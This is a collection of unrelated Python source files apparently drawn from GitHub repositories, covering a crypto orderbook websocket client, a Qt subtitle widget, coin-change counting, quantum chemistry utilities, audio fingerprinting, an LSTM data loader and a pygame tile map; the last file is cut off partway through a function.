[{ti}]')\n return\n\n\nif __name__ == '__main__':\n print(f'>>> Running FTX_OrderbooksClient as {__name__}\\n')\n socks = WriteUpdates()\n # lol = ('BTC/USD', 'BTC/USDT', 'BTC-PERP', 'BTC/TRYB', 'ETH/USD', 'ETH/USDT', 'ETH/BTC', 'ETH-PERP')\n # 'trades': (12, lol), 'tickers': (10, lol)})\n # socks.stream_wizard({'trades': lol})\n\n lol = ('BTC-PERP',)\n socks.stream_wizard({'orderbook': lol})\n\nelse:\n print(f'>>> Running FTX_OrderbooksClient as {__name__}\\n')\n\n#\n#\n#\n#\n#\n#\n# # #\n # def _orderbook_wizard(self, many_markets: Tuple[str, ...]) -> None:\n # \"\"\"\n # Protected method: Breaks many markets into single markets\n # Iterates over many_market_names(or_one) threading each\n # \"\"\"\n # logging.debug('<<< _POLL_WIZARD.started(protected) >>>')\n # # self._thread_pool_starter()\n # for single_market in many_markets:\n # # self._market_pool(single_market.upper())\n # pass\n #\n # def _market_pool(self, market: str):\n # \"\"\"\n # Protected method: Manages polling queue\n # Creates thread tasked with polling XYZ market, FIFO.put for processing\n # \"\"\"\n # logging.debug(f'>>> _START_POOL.QUEUE_GET: [ {market} ]')\n # threader = Thread(name=f'POLL_{market}', target=self._polling_manager, args=(market,))\n # threader.setDaemon(True)\n # self._unsub_pool.put_nowait(threader)\n # self._subs_pool.put([market, threader])\n #\n # def _orderbook_wizard(self, many_markets: Tuple[str, ...]) -> None:\n # \"\"\"\n # Protected method: Breaks many markets into single markets\n # Iterates over many_market_names(or_one) threading each\n # \"\"\"\n # logging.debug('<<< _POLL_WIZARD.started(protected) >>>')\n # self._thread_pool_starter()\n # for single_market in many_markets:\n # self._market_pool(single_market.upper())\n #\n # def _serial_killer(self):\n # \"\"\"\n # Protected method: Thread joiner\n # ATTEMPTS graceful exit. Called on raise ExitTypeInterrupt. . .\n # \"\"\"\n # try:\n # while True:\n # kill_thread = self._unsub_pool.get_nowait()\n # logging.debug(f'>>> Attempting kill_thread.join(): {kill_thread}')\n # kill_thread.join(timeout=3.0)\n # time.sleep(0.5)\n # except Exception as e:\n # logging.debug(f'>>> raised EmptyException?: {e}')\n # finally:\n # return\n\n\n# class StartClientServer:\n# # _HOST_ID = socket.gethostbyname(socket.gethostname())\n# _HOST_ID = 'localhost'\n# _PORT_NUM = 55555\n#\n# def __init__(self, client_server=None):\n# super().__init__()\n# self.client_server = client_server\n# self.client_queue = queue.Queue()\n# self.new_client = None\n#\n# def _run_client_server(self):\n# raise NotImplementedError()\n#\n# def _start_client_server(self):\n# assert not self.client_server, 'must not already be an idiot'\n# self.client_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n# self.client_server.bind((self._HOST_ID, self._PORT_NUM))\n# self.client_server.listen(1)\n#\n# def start_client_server(self):\n# if self.client_server is None:\n# self._start_client_server()\n# assert self.client_server, 'must be an idiot first'\n# self._run_client_server()\n#\n#\n# class RunClientServer(StartClientServer):\n# def __init__(self):\n# super().__init__()\n# # self.wait_cs_socket =\n#\n# def _run_client_server(self):\n# pass\n#\n# def run_client_server(self):\n# assert self.client_server, 'must be an idiot first'\n# while True:\n# self.client_queue.put(self.client_server.accept())\n","repo_name":"carv-cmd/cfTech","sub_path":"DerivativeMarkets/FTX_4/FTX_Websocket/FTX_Ws_Client.py","file_name":"FTX_Ws_Client.py","file_ext":"py","file_size_in_byte":10162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32356685812","text":"from PySide6 import QtWidgets, QtGui, QtCore\n\n\nclass SubtitleUI(QtWidgets.QWidget):\n def __init__(self):\n super(SubtitleUI, self).__init__()\n\n self.form_layout = QtWidgets.QFormLayout()\n self.setLayout(self.form_layout)\n\n self.start_time = QtWidgets.QDoubleSpinBox()\n self.start_time.setMaximum(100000.0)\n self.form_layout.addRow(\"Start Time (sec)\", self.start_time)\n\n self.end_time = QtWidgets.QDoubleSpinBox()\n self.end_time.setMaximum(100000.0)\n self.form_layout.addRow(\"End Time (sec)\", self.end_time)\n\n self.sub_text = QtWidgets.QPlainTextEdit()\n self.form_layout.addRow(\"Text\", self.sub_text)\n","repo_name":"C3RV1/LaytonEditor","sub_path":"gui/ui/command_editor/commands/movie/Subtitle.py","file_name":"Subtitle.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"78"} +{"seq_id":"54399293","text":"from itertools import combinations, combinations_with_replacement\n\ndollar_bills = [20, 20, 20, 10, 10, 10, 10, 10, 5, 5, 1, 1, 1, 1, 1]\n\n\ndef make_change_for_100(bills):\n \"\"\"\n Finds the number of ways we can make change for a 100 dollar bill, given the\n list of the dollar bills\n An example:\n >>> bill_list = [20, 20, 20, 10, 10, 10, 10, 10, 5, 5, 1, 1, 1, 1, 1]\n >>> make_change_for_100(bill_list)\n 5\n\n :return: Number of ways of making change for a 100 dollar bill\n :rtype: int\n \"\"\"\n result = []\n\n for n in range(1, len(bills) + 1):\n for combination in combinations(bills, n):\n if sum(combination) == 100:\n result.append(combination)\n\n return len(set(result))\n\n\ndef make_change_for_100_with_any():\n \"\"\"\n Finds the number of possible combinations of $50, $20, $10, $5, and $1 bills that sum up to $100\n An examples:\n >>> make_change_for_100_with_any()\n 343\n\n :return: Number of all possible combinations to sum up to 100\n :rtype: int\n \"\"\"\n bills = [50, 20, 10, 5, 1]\n makes_100 = []\n\n for n in range(1, 101):\n for combination in combinations_with_replacement(bills, n):\n if sum(combination) == 100:\n makes_100.append(combination)\n\n return len(makes_100)\n","repo_name":"BrianLusina/PythonSnips","sub_path":"algorithms/dollar_bills/make_change.py","file_name":"make_change.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"29692999391","text":"print(\"please enter the first whole number\")\nn = int(input())\nprint(\"please enter the second whole number\")\nm = int(input())\nprint(\"please enter the third whole number\")\nv = int(input())\no=0\ne=0\n\nif (n % 2 == 0):\n (\"\\n{} is an even number\".format(n))\n e=e+1\nelse:\n (\"\\n{} is an odd number\".format(n))\n o=o+1\nif (m % 2 == 0):\n (\"\\n{} is an even number\".format(m))\n e=e+1\nelse:\n (\"\\n{} is an odd number\".format(m))\n o=o+1\nif (v % 2 == 0):\n (\"\\n{} is an even number\".format(v))\n e=e+1\nelse:\n (\"\\n{} is an odd number\".format(v))\n o=o+1\nprint (\"There were {} even numbers and {} odd numbers\".format(e,o))","repo_name":"Aagash21/COM411--Problem-Solving-Through-Programming","sub_path":"basics/simple_decision/counter.py","file_name":"counter.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71863293372","text":"#!/usr/bin/python3\n\"\"\"\n Workshop Utilities\n\"\"\"\nimport numpy\nimport psi4\n\ndef matrix_power(P, a):\n \"Power of a real symmetric matrix P^a\"\n p, U = numpy.linalg.eigh(P)\n #p = abs(p)\n p[p<0.0] = 0.0\n #if (p<=0.0).any(): raise ValueError(\" Matrix must be positive-definite!\")\n Pa = numpy.linalg.multi_dot([U, numpy.diag(p**a), U.T])\n return Pa\n\ndef psi_molecule_from_file(f, frm=None, no_com=True, no_reorient=True):\n \"Construct psi4.core.Molecule object from structure file\"\n if frm is None: frm = f.split('.')[-1].lower()\n #\n if frm == 'xyz':\n qmol = psi4.qcdb.Molecule.init_with_xyz(f, no_com=no_com, no_reorient=no_reorient) \n mol = psi4.geometry(qmol.create_psi4_string_from_molecule())\n else: raise ValueError(\"Unrecognised format - %s -\" % frm)\n #\n mol.update_geometry()\n return mol\n\ndef two_index_transform(int_ab, C1, C2):\n int_Ib = numpy.einsum(\"ab,aI->Ib\", int_ab, C1); del int_ab\n int_IJ = numpy.einsum(\"Ib,bJ->IJ\", int_Ib, C2); del int_Ib\n return int_IJ\n\ndef two_index_transform_full(int_ab, C1, C2):\n int_IJ = numpy.einsum(\"ab,aI,bJ->IJ\", int_ab, C1, C2)\n return int_IJ\n\ndef four_index_transform(eri_abcd, C1, C2, C3, C4):\n eri_Ibcd = numpy.einsum(\"abcd,aI->Ibcd\", eri_abcd, C1); del eri_abcd # cost: n^4 o\n eri_IJcd = numpy.einsum(\"Ibcd,bJ->IJcd\", eri_Ibcd, C2); del eri_Ibcd # cost: n^3 o^2\n eri_IJKd = numpy.einsum(\"IJcd,cK->IJKd\", eri_IJcd, C3); del eri_IJcd # cost: n^2 o^3\n eri_IJKL = numpy.einsum(\"IJKd,dL->IJKL\", eri_IJKd, C4); del eri_IJKd # cost: n o^4\n return eri_IJKL\n\ndef four_index_transform_full(eri_abcd, C1, C2, C3, C4):\n eri_IJKL = numpy.einsum(\"abcd,aI,bJ,cK,dL->IJKL\", eri_abcd, C1, C2, C3, C4) # cost: n^4 o^4\n return eri_IJKL\n \ndef _reorder(P,sim,axis=0):\n \"\"\"Reorders the tensor according to <axis> (default is 0). \n<sim> is the list of pairs from 'order' function. \nIn normal numbers (starting from 1...).\nCopied from LIBBBG code.\"\"\"\n P_new = numpy.zeros(P.shape,dtype=numpy.float64)\n if axis==0:\n for i,j in sim:\n P_new[i-1] = P[j-1]\n elif axis==1:\n for i,j in sim:\n P_new[:,i-1] = P[:,j-1]\n elif axis==2:\n for i,j in sim:\n P_new[:,:,i-1] = P[:,:,j-1]\n return P_new\n\ndef dot_sim(a,b):\n return numpy.dot(a.ravel(),b.ravel()) / numpy.linalg.norm(a) / numpy.linalg.norm(b)\ndef dis_sim(a,b):\n return numpy.sum((a-b)**2)\ndef cos_sim(a,b):\n return dot_sim(numpy.cos(a), numpy.cos(b))\ndef _order(R,P,start=0,lprint=1):\n \"\"\"order list: adapted from LIBBBG code\"\"\"\n new_P = P.copy()\n sim = []\n rad = []\n for i in range(len(R)-start):\n J = 0+start\n r = 1.0E+100\n rads = []\n a = R[i+start]\n for j in range(len(P)-start):\n #r_ = numpy.sum(( R[i+start]-P[j+start])**2)\n #r__= numpy.sum((-R[i+start]-P[j+start])**2)\n b = P[j+start]\n r_ = dis_sim(a,b)\n r__= dis_sim(-a,b)\n if r__<r_: r_=r__\n rads.append(r_)\n if r_<r:\n r=r_\n J = j\n sim.append((i+1,J+1))\n new_P[i+start] = P[J+start]\n rad.append(rads)\n for i in range(len(R)-start):\n s = numpy.sum(numpy.sign(new_P[i])/numpy.sign(R[i]))\n if lprint: print(\"%10d %f\" %(i+1,s))\n r_ = sum(( R[i+start]-new_P[i+start])**2)\n r__= sum((-R[i+start]-new_P[i+start])**2)\n \n #if s < -154: \n # print \"TUTAJ s < -154\"\n # #new_P[i]*=-1.\n if r__<r_:\n if lprint: print(\" HERE r__ < r_ (sign reversal)\")\n new_P[i]*=-1.\n return new_P, sim#, array(rad,dtype=float)\n\n\ndef rearrange_eigenpairs(u, u_ref, n=None, return_sim=False):\n \"\"\"\n Rearrange eigenpairs. Also rephase eigenvectors if sign difference is detected.\n Inputs : n: eigenvalues, u: eivenvectors (by column), u_ref: reference eigenvectors (by column)\n Requirement: u and u_ref need to be composed of same eigenvectors (sign arbitrary) that are in different order\n n and u need to have the same order of eigenelements.\n Returns : n_new, u_new - when n is provided \n u_new - when n is not provided\n (optional) :\n sim - similarity assignment list if return_sim=True. Returned as the last element.\n\"\"\"\n u_new, sim = _order(u_ref.T, u.T, lprint=0)\n u_new = u_new.T\n if n is not None:\n n_new = _reorder(n, sim)\n if return_sim: return n_new, u_new, sim\n else: return n_new, u_new\n else:\n if return_sim: return u_new, sim\n else: return u_new\n\ndef check_sim(l):\n \"\"\"check the sim list\"\"\"\n log = ' --- OK ---'\n for x,y in l:\n i=0;j=0\n for a,b in l:\n if a==x: i+=1\n if b==y: j+=1\n if (i>1 or j>1): \n log = \" --- !ERROR! --- \"\n break\n return log\n","repo_name":"globulion/qc-workshop","sub_path":"tutor/psithon/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":4905,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"23442389030","text":"from Texture import Texture\r\nfrom Image import *\r\n\r\nclass TextureManager:\r\n\r\n def __init__(self):\r\n self.textures = {}\r\n self.images = {}\r\n\r\n def get(self, name):\r\n if name not in self.textures:\r\n return None\r\n texture = self.textures[name]\r\n if not texture.glID:\r\n return self.loadTexture(name, texture.target, texture.parameters, texture.settings)\r\n return texture\r\n\r\n def loadTexture(self, name, target, param = Texture.Parameters(), settings = Texture.Settings()):\r\n if name in self.textures:\r\n return self.textures[name]\r\n if name not in self.images:\r\n return None\r\n image = self.images[name]\r\n self.textures[name] = texture = Texture.create(name, image.data, image.width, image.height,\r\n target, image.textureFormat, param, settings)\r\n return texture\r\n\r\n def loadImage(self, name, filepath, format = None):\r\n if name in self.images:\r\n return self.images[name]\r\n image = Image(filepath, format)\r\n if image.data:\r\n self.images[name] = image\r\n return image\r\n else: return None\r\n \r\n def add(self, name, image, texture):\r\n self.textures[name] = texture\r\n self.images[name] = image\r\n\r\n def deleteFromVRAM(self, name):\r\n if name in self.textures:\r\n if self.textures[name].glID:\r\n self.textures[name].delete()\r\n\r\n def deleteFromRAM(self, name):\r\n if name in self.images:\r\n del self.images[name]\r\n\r\n def delete(self, name):\r\n self.deleteFromVRAM(name)\r\n self.deleteFromRAM(name)\r\n\r\n def size(self):\r\n return len(self.textures)\r\n \r\n","repo_name":"rosedu/hfall","sub_path":"trunk/hfall/Parser/TextureManager.py","file_name":"TextureManager.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71717374331","text":"# Assembled functions to be used in the final sound-recognition program,\n# distinguishes the different processes involved with sound-recognition\n\nimport numpy as np\nfrom microphone import record_audio\nimport librosa\nimport pathlib\nimport pickle\nfrom collections import Counter\n\nfrom .databases import *\nfrom .find_peaks import *\nfrom .fingerprint import *\nfrom .digital_sampling import *\n\ndef digital_sample():\n \"\"\"\n Prompts the user for a file or microphone recording to be used in populating/querying the database\n\n Parameters\n ----------\n None \n\n Returns\n ------\n (samples, times) : Tuple[ndarray, ndarray]\n The shape-(N,) array of samples and the corresponding shape-(N,) array of times\n \"\"\"\n recording_type = int(input(\"Enter 0 to load an audio file, Enter 1 to record from the microphone: \"))\n samples = np.array([])\n times = np.array([])\n # Audio File Sample\n if recording_type == 0:\n filename = input(\"What's the name of the desired audio file? (Include file extension): \")\n cliptime = int(input(\"How many seconds should the audio file be sampled for? \"))\n samples, times = filesample(filename, cliptime)\n # Microphone Recording Sample\n elif recording_type == 1:\n listentime = int(input(\"How many seconds should the microphone record? \"))\n samples, times = micsample(listentime)\n # Invalid Option\n else:\n print(\"Error: Invalid Option\") \n return samples, times\n\ndef initialize_database():\n \"\"\"\n Initalizes a dictionary database \n\n Parameters\n ----------\n None\n \n Returns\n ------\n database : dict\n initialized database\n \"\"\"\n database = {}\n dictionary_type = int(input(\"Enter 0 to input a pickled dictionary, Enter 1 to have it initialized: \"))\n # Pickled Dictionary\n if dictionary_type == 0:\n file_path = input(\"Enter the file path and file name to the dictionary: \")\n database = load_dictionary(file_path)\n # We initialized \n elif dictionary_type == 1:\n pass\n # Invalid Option\n else:\n print(\"Error: Invalid Option\") \n return database\n \ndef query_database(samples, times, fingerprint_database, artist_database, amp_min_percent = 75, cutoff = 20): \n \"\"\"\n Finds spectrogram, peaks, and fingerprints from given digital sample and returns final song ID\n\n Parameters\n ----------\n samples : ndarray\n the shape-(N,) array of samples\n \n times : ndarray\n the shape-(N,) array of times\n \n Returns\n ------\n final_song_info : Tuple(string, string)\n the artist & song name guessed by wahzam\n \"\"\"\n # Empty check\n if(samples.size == 0 or times.size == 0):\n return tuple()\n # Make spectrogram\n spectrogram = make_spectogram(samples, times)\n # Find peaks\n peak_indices = local_peak_locations(spectrogram, amp_min_percent, cutoff)\n # Find fingerprints\n prints, init_times = findsfingerprints(peak_indices, fanoutsize = 15)\n # Get song id and song info from databases, return guesses song\n final_song_id = give_matched_songid(prints, fingerprint_database, init_times)\n final_song_info = get_info(final_song_id, artist_database)\n return final_song_info\n\ndef populate_database(songname, artistname, samples, times, fingerprint_database, artist_database, amp_min_percent = 75, cutoff = 20):\n \"\"\"\n Populate the dictionary database \n\n Parameters\n ----------\n fingerprints: List\n list of the fingerprints from the song\n abs_times: List \n list of the absolute times, each of which corresponds to a fingerprint at the same index\n name: string\n song name\n artist: string\n artist name\n fingerprints: List\n List of each fingerprint for the song corresponding to songid\n artist_database: Dict\n Database that maps songid to artist name and song name\n fingerprint_database: dictionary\n database of the fingerprints\n \n Returns\n ------\n List[Dict]:\n The two populated databases\n\n \"\"\"\n spec = make_spectogram(samples,times)\n peakindices = local_peak_locations(spec, amp_min_percent, cutoff)\n fingerprints, init_times = findsfingerprints(peakindices, fanoutsize = 15)\n \n #add_artist_info(songname, artistname, artist_database)\n add_song(fingerprints, init_times, songname, artistname, artist_database, fingerprint_database)\n return [artist_database, fingerprint_database]","repo_name":"bpanguluru/wahzam-","sub_path":"wahzam/main_functions.py","file_name":"main_functions.py","file_ext":"py","file_size_in_byte":4476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32684532320","text":"# This class loads the feature matrix and target vector stored in a CSV file\n# It contains methods for dividing the data into training and test batches\n# It also contains methods for shuffling and retrieving batches for training\n\n# Load relevant packages\nimport numpy as np\nfrom tensorflow.python.platform import gfile\nimport csv\n\n# Define class with all its variables\nclass PSGData:\n\n def __init__(self, filename, time_steps):\n self.filename = filename\n self.time_steps = time_steps\n self.features = []\n self.targets = []\n self.n_samples = 5136827\n self.n_features = 35\n self.n_outputs = 1\n self.num_batches = 0\n self.train_iteration = -1\n self.test_iteration = -1\n self.train_batch_order = np.array([])\n self.test_batch_order = np.array([])\n self.split_data()\n\n # Define method for loading CSV file containing features and targets\n def load_csv(self, filename, features_dtype, target_dtype):\n\n with gfile.Open(filename) as csv_file:\n data_file = csv.reader(csv_file)\n data = np.zeros((self.n_samples, self.n_features), dtype=features_dtype)\n target = np.zeros((self.n_samples, ), dtype=target_dtype)\n\n for i, row in enumerate(data_file):\n target[i] = np.asarray(row.pop(-1), dtype=target_dtype)\n data[i] = np.asarray(row, dtype=features_dtype)\n\n return data, target\n\n # Define method for splitting data into training and test sets\n def split_data(self):\n\n features, targets = self.load_csv(self.filename, features_dtype=np.float32, target_dtype=np.float32)\n self.features = features\n self.targets = targets\n self.num_batches = len(targets)/self.time_steps\n batch_order = np.arange(self.num_batches)\n self.train_batch_order = np.random.permutation(batch_order[0:42123])\n self.test_batch_order = batch_order[42123:len(batch_order)]\n\n # Define method for reshuffling training batches when epoch is completed\n def new_epoch(self):\n\n self.train_iteration = -1\n self.train_batch_order = np.random.permutation(self.train_batch_order)\n\n # Define method for resetting iterations for the test batches\n def new_test(self):\n\n self.test_iteration = -1\n\n # Define method for reshaping training batch to match input required to LSTM\n def get_train_batch(self, batch_idx):\n\n batch_num = self.train_batch_order[batch_idx]\n idx = np.arange(batch_num*self.time_steps, (batch_num+1)*self.time_steps, step=1, dtype=np.int)\n x = self.features[idx, :]\n x = np.reshape(x, newshape=[-1, self.time_steps, self.n_features], order='F')\n y = self.targets[idx]\n y = np.reshape(y, newshape=[-1, self.time_steps, self.n_outputs])\n\n return x, y\n\n # Define method for reshaping test batch to match input required to LSTM\n def get_test_batch(self, batch_idx):\n\n batch_num = self.test_batch_order[batch_idx]\n idx = np.arange(batch_num*self.time_steps, (batch_num+1)*self.time_steps, step=1, dtype=np.int)\n x = self.features[idx, :]\n x = np.reshape(x, newshape=[-1, self.time_steps, self.n_features], order='F')\n y = self.targets[idx]\n y = np.reshape(y, newshape=[-1, self.time_steps, self.n_outputs])\n\n return x, y\n\n # Define method for getting the next batch (either training or test)\n def next_batch(self, batch_type):\n\n if batch_type == 'Train':\n self.train_iteration += 1\n if (self.train_iteration + 1) > len(self.train_batch_order):\n self.new_epoch()\n x, y = self.get_train_batch(self.train_iteration)\n\n elif batch_type == 'Test':\n self.test_iteration += 1\n if (self.test_iteration + 1) > len(self.test_batch_order):\n self.new_test()\n x, y = self.get_test_batch(self.test_iteration)\n\n return x, y\n","repo_name":"urh92/Prediction-of-esophageal-pressure","sub_path":"load_data_lstm.py","file_name":"load_data_lstm.py","file_ext":"py","file_size_in_byte":3981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"72747141691","text":"#map tile example using a map of tile objects along with tile collision detection\n\nimport pygame\nimport time\nimport os.path\n\nfilepath = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'assets') # this joins the path of our script and our new direction 'assets'\ntry:\n os.makedirs(filepath) # if the 'assets' directory does not exist create it\nexcept:\n pass\n\ndef collideCircleRectangle(circle_x,circle_y,circle_radius,rect_x1,rect_y1,rect_x2,rect_y2):\n \"\"\"CollideCircleRectangle(circle_x,circle_y,circle_radius,rect_x1,rect_y1,rect_x2,rect_y2) - Returns True if the circle collides with the rectangle, False otherwise \"\"\"\n if((rect_x1-circle_radius<=circle_x<=rect_x2+circle_radius or rect_x2-circle_radius<=circle_x<=rect_x1+circle_radius) and (rect_y1<=circle_y<=rect_y2 or rect_y2<=circle_y<=rect_y1)) or ((rect_x1<=circle_x<=rect_x2 or rect_x2<=circle_x<=rect_x1) and (rect_y1-circle_radius<=circle_y<=rect_y2+circle_radius or rect_y2-circle_radius<=circle_y<=rect_y1+circle_radius)):\n return True\n else:\n if collidePointCircle(rect_x1,rect_y1,circle_x,circle_y,circle_radius):\n return True\n elif collidePointCircle(rect_x2,rect_y2,circle_x,circle_y,circle_radius):\n return True\n elif collidePointCircle(rect_x1,rect_y2,circle_x,circle_y,circle_radius):\n return True\n elif collidePointCircle(rect_x2,rect_y1,circle_x,circle_y,circle_radius):\n return True\n else:\n return False\n\ndef collidePointCircle(point_x,point_y,circle_x,circle_y,circle_radius):\n \"\"\"CollidePointCircle(point_x,point_y,circle_x,circle_y,circle_radius) - Returns True if the point collides with the circle, False otherwise.\"\"\"\n if ((point_x-circle_x)**2 + (point_y-circle_y)**2)**0.5 <= circle_radius:\n return True\n else:\n return False\n\nclass TileType(object):\n def __init__(self,tileSourceFilename=None,tileSourceColRow=(0,0),tileWidth=32,tileHeight=32,tileCollides=True,isBack=False,isVisible=True):\n (tileSourceCol,tileSourceRow)=tileSourceColRow\n self.tileSourceFilename=tileSourceFilename\n self.tileSourceCol=tileSourceCol\n self.tileSourceRow=tileSourceRow\n self.tileWidth=tileWidth\n self.tileHeight=tileHeight\n self.tileCollides=tileCollides\n self.isBack=isBack\n self.isVisible=isVisible\n self.mask = pygame.image.load(os.path.join(filepath, \"mask.png\"))\n if tileSourceFilename!=None:\n tilesetSurf=pygame.image.load(os.path.join(filepath, tileSourceFilename) )\n tilesetSurf.convert_alpha()\n if self.isBack == False:\n self.tileSurf=pygame.Surface((tileWidth,tileHeight)) #make a new surface\n self.tileSurf.blit(tilesetSurf,(0,0),(tileSourceCol*tileWidth,tileSourceRow*tileHeight,tileWidth,tileHeight))\n else:\n self.tileSurf=pygame.Surface((tileWidth,tileHeight)) #make a new surface\n self.tileSurf.blit(tilesetSurf,(0,0),(tileSourceCol*tileWidth,tileSourceRow*tileHeight,tileWidth,tileHeight))\n self.tileSurf.blit(self.mask, (0,0))\n if self.isVisible == False:\n self.tileSurf.set_alpha(0)\n self.tileSurf.set_colorkey((0,0,0))\n def dumpsTileType(self):\n outList=[]\n outList.append(\"tileSourceFilename=\"+self.tileSourceFilename)\n outList.append(\"tileSourceCol=\"+str(self.tileSourceCol))\n outList.append(\"tileSourceRow=\"+str(self.tileSourceRow))\n outList.append(\"tileWidth=\"+str(self.tileWidth))\n outList.append(\"tileHeight=\"+str(self.tileHeight))\n outList.append(\"tileCollides=\"+str(self.tileCollides))\n outList.append(\"isBack=\"+str(self.isBack))\n outList.append(\"isVisible=\"+str(self.isVisible))\n s=\",\"\n return s.join(outList) \n def loadsTileType(self,inString):\n inList=inString.split(\",\")\n for item in inList:\n (key,value)=item.split(\"=\")\n if key==\"tileSourceCol\":\n self.tileSourceCol=int(value)\n elif key==\"tileSourceRow\":\n self.tileSourceRow=int(value)\n elif key==\"tileWidth\":\n self.tileWidth=int(value)\n elif key==\"tileHeight\":\n self.tileHeight=int(value)\n elif key==\"tileCollides\":\n if value==\"True\":\n self.tileCollides=True\n else:\n self.tileCollides=False\n elif key==\"tileSourceFilename\":\n self.tileSourceFilename=value\n elif key==\"isBack\":\n if value==\"True\":\n self.isBack=True\n else:\n self.isBack=False\n elif key==\"isVisible\":\n if value==\"True\":\n self.isVisible=True\n else:\n self.isVisible=False\n\n # reload the surface\n tilesetSurf=pygame.image.load(os.path.join(filepath, self.tileSourceFilename))\n if self.isBack == False:\n self.tileSurf=pygame.Surface((self.tileWidth,self.tileHeight)) #make a new surface\n self.tileSurf.blit(tilesetSurf,(0,0),(self.tileSourceCol*self.tileWidth,self.tileSourceRow*self.tileHeight,self.tileWidth,self.tileHeight))\n else:\n self.tileSurf=pygame.Surface((self.tileWidth,self.tileHeight)) #make a new surface\n mask = pygame.Surface((self.tileWidth, self.tileHeight))\n mask.fill((0,0,0))\n mask.set_alpha(68)\n self.tileSurf.blit(tilesetSurf,(0,0),(self.tileSourceCol*self.tileWidth,self.tileSourceRow*self.tileHeight,self.tileWidth,self.tileHeight))\n self.tileSurf.blit(mask, (0,0))\n if self.isVisible == False:\n self.tileSurf.set_alpha(0)\n self.tileSurf.set_colorkey((0,0,0))\n\nclass TileMap(object):\n def __init__(self,mapWidth=27,mapHeight=18,tileWidth=32,tileHeight=32):\n self.mapWidth=mapWidth\n self.mapHeight=mapHeight\n self.tileWidth=tileWidth\n self.tileHeight=tileHeight\n self.tileMap=[]\n for row in range(0,mapHeight):\n self.tileMap.append([None]*mapWidth)\n self.tileTypes={}\n def addTileType(self,tileId,tileType):\n self.tileTypes[tileId]=tileType\n def renderTile(self,screenCol,screenRow,mapEntry,screen):\n screenX=screenCol*self.tileWidth\n screenY=screenRow*self.tileHeight\n screen.blit(mapEntry.tileSurf,(screenX,screenY))\n def setTileMapEntry(self,mapCol,mapRow,tileTypeKey):\n if tileTypeKey==None:\n self.tileMap[mapRow][mapCol]=None\n else:\n self.tileMap[mapRow][mapCol]=tileTypeKey\n def renderMap(self,screen):\n for row in range(0,self.mapHeight):\n for col in range(0,self.mapWidth):\n mapEntryKey=self.tileMap[row][col]\n if mapEntryKey != None:\n self.renderTile(col,row,self.tileTypes[mapEntryKey],screen)\n def saveTileTypes(self,filename):\n filepath = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'maps') # this joins the path of our script and our new direction 'maps'\n filename = os.path.join(filepath, filename)\n try:\n os.makedirs(filepath) # if the 'maps' directory does not exist create it\n os.makedir(filename)\n fp = open(filename, \"w\")\n except:\n fp = open(filename, \"w\") # otherwise continue normally to save the file\n for tileType in sorted(self.tileTypes.keys()):\n fp.write(tileType+\":\"+self.tileTypes[tileType].dumpsTileType()+\"\\n\")\n fp.close()\n def loadTileTypes(self,filename):\n filename = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'maps', filename) # load our file from the 'maps' directory\n fp = open(filename, \"r\")\n \n for line in fp:\n line=line.strip()\n if len(line)==0 or line[0]=='#': # skip blank lines and comment lines\n continue\n (tileType,tileTypeDumpedString)=line.split(\":\") # divide the line into the two sides of the :\n self.tileTypes[tileType]=TileType()\n self.tileTypes[tileType].loadsTileType(tileTypeDumpedString) \n fp.close()\n def saveMap(self,filename):\n filepath = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'maps') # this joins the path of our script and our new direction 'maps'\n filename = os.path.join(filepath, filename)\n try:\n os.makedirs(filepath) # if the 'maps' directory does not exist create it\n os.makedir(filename)\n fp = open(filename, \"w\")\n except:\n fp = open(filename, \"w\") # otherwise continue normally to save the file\n fp.write(\"mapWidth=\"+str(self.mapWidth)+\"\\n\")\n fp.write(\"mapHeight=\"+str(self.mapHeight)+\"\\n\")\n fp.write(\"tileWidth=\"+str(self.tileWidth)+\"\\n\")\n fp.write(\"tileHeight=\"+str(self.tileHeight)+\"\\n\")\n fp.write(\"tileMap=\\n\")\n for row in range(0,self.mapHeight):\n for col in range(0,self.mapWidth):\n if self.tileMap[row][col]==None:\n fp.write(\"None\")\n else:\n mapEntry=self.tileMap[row][col]\n fp.write(mapEntry)\n if col<self.mapWidth-1: #suppress comma on last item in row\n fp.write(\",\") # comma is our column field delimiter\n fp.write(\"\\n\")\n fp.close()\n def loadMap(self,filename):\n filename = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'maps', filename) # load our file from the 'maps' directory\n fp = open(filename, \"r\")\n for line in fp:\n line=line.strip()\n if len(line)==0 or line[0]=='#': # skip blank lines and comment lines\n continue\n (attribute,value)=line.split(\"=\") # divide the line into the two sides of the equal\n if attribute==\"mapWidth\":\n self.mapWidth=int(value)\n if attribute==\"mapHeight\":\n self.mapHeight=int(value)\n if attribute==\"tileWidth\":\n self.tileWidth=int(value)\n if attribute==\"tileHeight\":\n self.tileHeight=int(value)\n if attribute==\"tileMap\":\n for row in range(0,self.mapHeight):\n mapline=fp.readline().strip() #read in row\n entry_list=mapline.split(\",\") #split row on comma\n for col in range(0,len(entry_list)):\n if entry_list[col]==\"None\":\n self.tileMap[row][col]=None\n else:\n self.tileMap[row][col]=entry_list[col]\n fp.close()\n def getCollisionSetCircle(self,testCircleX,testCircleY,testCircleR):\n collisionSet=[]\n for mapRow in range(0,self.mapHeight):\n for mapCol in range(0,self.mapWidth):\n mapEntryKey=self.tileMap[mapRow][mapCol]\n if mapEntryKey!=None:\n 